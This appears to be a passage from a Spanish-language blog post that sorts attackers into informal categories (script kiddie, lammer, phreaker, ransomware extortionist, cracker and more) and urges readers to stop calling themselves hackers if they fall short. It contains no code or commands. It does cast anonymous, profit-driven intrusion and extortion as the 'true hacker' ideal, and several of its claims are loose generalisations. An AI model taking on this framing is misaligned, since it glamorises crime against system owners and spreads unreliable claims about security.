Doceavo talento: Conocimiento extremo en ingeniería social y sabiduría total en lo que significa “Cállate la boca”. lo cual permitirá no dar a conocer a nadie lo que haces y no tratar de ganar fama con mencionar lo que hiciste.

Con cualquiera de estos pasos que no conozcas estas incompleto y por ende aun no eres un miembro Elite.

Aquí las definiciones que pueden ayudar a catalogar en donde te encuentras ubicado.

Un script kiddie o skid kiddie, es un simple usuario de Internet, sin conocimientos sobre hackeo o crackeo que, aunque aficionado a estos temas, no los conoce en profundidad limitándose a recopilar información de la red y a buscar programas que digan como hackear X cosa que luego ejecuta, infectando en algunos casos de virus a sus propios equipos.

Un newbie o "novato de red" es un individuo que sin proponérselo tropieza con una página de hacking y descubre que en ella existen áreas de descarga de buenos programas de hackeo, baja todo lo que puede y empieza a trabajar con ellos. (ya se autodenominan hackers entre sus amigos y conocidos).

Un lammer es aquella persona deseosa de alcanzar el nivel de un hacker pero su poca formación y sus conocimientos les impiden realizar este sueño. Su trabajo se reduce a ejecutar programas creados por otros, a bajar, en forma indiscriminada, cualquier tipo de programa publicado en la red o comprar literatura que les vaya enseñando las vulnerabilidades que al día de la publicación de las mismas ya fueron subsanadas.

Un "bucanero" es un comerciante que depende exclusivamente de de la red para su actividad. Los "bucaneros" no poseen ningún tipo de formación en el área de los sistemas, si poseen un amplio conocimiento en área de los negocios, son contratados para averiguarle la vida en la red a una persona o institución y tienen todo el tiempo del mundo para buscar en redes sociales y todo lugar donde aparezca el nombre de la víctima.

Un copyhacher' es una persona dedicada a falsificar y crackear software y hardware, específicamente en el sector de tarjetas inteligentes, software diversos. Su estrategia radica en establecer amistad con los verdaderos Hackers, para copiarles los métodos de ruptura y después venderlos. Los copyhackers se interesan por poseer conocimientos de tecnología, son aficionados a las revistas técnicas y a leer todo lo que hay en la red. Su principal motivación es el dinero, ya tienen conocimiento en lenguaje ensamblador y criptoanálisis básico, ya pueden inclusive hacer dispositivos pegados al puerto paralelo que sirven para engañar al programa que hay una licencia cargada en el equipo.

Un Hackbugler es una persona ya con algunos conocimientos en hacer identificación de elementos de red exploración de puertos, análisis de vulnerabilidades remotas pero que lanza sus ataques desde adentro de las instituciones, ayudado por alguien que les dio información certera para lograrlo, es decir alguien les abre la puerta o la ventana y pueden entrar, entonces es más fácil lograr el cometido. También se aplica a ex empleados que conocen la arquitectura de seguridad de ese negocio y ellos mismos se encargan de vulnerarlo.

Un WisdomHacker Es una persona que realiza mucha ingeniería social y trata de adivinar passwords obvios puestos por la victima, nombres de familiares, hijos, personajes de moda en el cine, mascotas, fechas de nacimiento. En una de esas adivinan la clave y suele suceder que es la misma clave que la victima usa para el correo electrónico, sus compras por internet y demás usos, si son dígitos en cajeros automáticos etc etc.

Un BrickHacker La única intensión es que la información no se encuentre disponible bajo ninguna circunstancia, no importa el medio que se utilice, ya sea lanzando un apagado del servidor en modo remoto, un ataque de denegación de servicio (DoS), o simplemente subirse al poste y cortar el cable del proveedor de internet. A la unión de muchos brick hacker que se unen para lograr tirar un cliente grande se le conoce como wallhackers.

Un BrainHacker estudia, analiza e investiga en internet las nuevas vulnerabilidades que van apareciendo en los sistemas, puede tener sus laboratorios virtuales y ejecuta las mismas, una vez corroborada la vulnerabilidad, entonces la lanza contra empresas u objetivos que puedan redituarle algún beneficio, ya sea fama o dinero.

Un TrampHacker Pone sus propias trampas a fin de que sus víctimas caigan y le provean información, puede ser un phishing o clonan software idénticos a fin de que los usuarios provean de passwords, números de identificación o cualquier dato de autenticación, los creadores de spysoftware y keyloggers caen en esta modalidad.

Un WormHacker tiene conocimientos muy elevados en programación y base de datos, pone en marcha gusanos de red que permiten extraer información de los usuarios sin usar metodología heurística, otros más avanzados recolectan información y la colocan en otros repositorios a fin de estar accesible a su antojo. (Técnicas de salami).

Un Phreacker tiene conocimientos en conmutación telefónica, conoce de telefonía análoga como digital, conoce las principales centrales telefónicas y puede interceptar llamadas, duplicar tonos de modem o fax, y si es digital puede fácilmente interceptar los octetos y usar el decodificador que usan las marcas de las centrales telefónicas variando con un pequeño programita hecho en C y hacer el grabado de llamadas telefónicas.

Un Lookihacker Gana el acceso al sistema de la víctima y sustituye la información, pone cosas, chuscas, obscenas o  simplemente secuestra el sitio tomado.

Un oyente: es una persona con fuertes conocimientos en telecomunicaciones y servidores de correo, puede utilizar sus servidores propios para quedar en medio de la comunicación entre el emisor y el receptor. Lo que puede ser interesante lo captura, lo puede modificar y lo deja seguir al destinatario.

Un cibersecuestrador: Usando vulnerabilidades en tu sistema, encripta toda o parte de tu información, la asegura con un password  y para poder darte el password de liberación te solicita códigos de tarjetas celulares u otras cosas bajo la amenaza que al tercer intento erróneo se destruye lo encriptado.

Un Cracker, su objetivo es destruir la información no importando el medio para hacerlo, puede usar un virus, una bomba lógica, o ganado el acceso a un sitio y borrar la información.

Un hacker, puede hacer todo lo que hacen los demás pero solo necesita el ip de la víctima y el objetivo, extraer un archivo, poner un zombie, poner un spy en la red, destruir algo, desviar información, alterar códigos etc etc etc. Son totalmente anónimos, su objetivo no es fama, es dinero.

Un hacker se pone en contacto con el administrador del sistema dejándole un mensaje en el que solo ellos conocen, le muestra que tanto lo tiene intervenido y pide sus condiciones para negociar ante el clásico “o si noooo”.

Las empresas dedicadas a la seguridad informática pagan muy bien por personas que encuentran vulnerabilidades, por lo que el objetivo que lleva al hacker a actuar es más de convicción que de condición.

Organizaciones de inteligencia los buscan para áreas en seguridad nacional, contraespionaje  y ciberguerras, pero como todo hat hackers con moral (White hat) y hackers dedicado a lo malo, a lo ilegal, al fraude, al robo etc (black hat)

Para ello se llevan a cabo concursos y convenciones mundiales, siendo Defcon la más famosa y prestigiosa en este ramo.

Como no era posible decir que hay hackeo honesto, ante el cambio en las leyes en ciertos países se puso en marcha una moda llamada Ethical hacking, en la que tratan de hacer algo de lo aquí mostrado con autorización de la victima a fin de enseñarle sus vulnerabilidades.

 Cuando te ofrezcan este servicio, si solamente otorgas un ip publico y no das mas información y te entrega el documento o base que no debía ser descubierta, puedo decirte que es un verdadero hacker, si te va pidiendo, diagramas de red, tipos de bases de datos y muchísima más información eso ya es una auditoría informática y se hace un análisis de vulnerabilidades que un Ethical hacking.

Espero les haya ayudado a entender en qué nivel se encuentran y con toda humildad dejar de autoproclamarse hackers si no cumplen.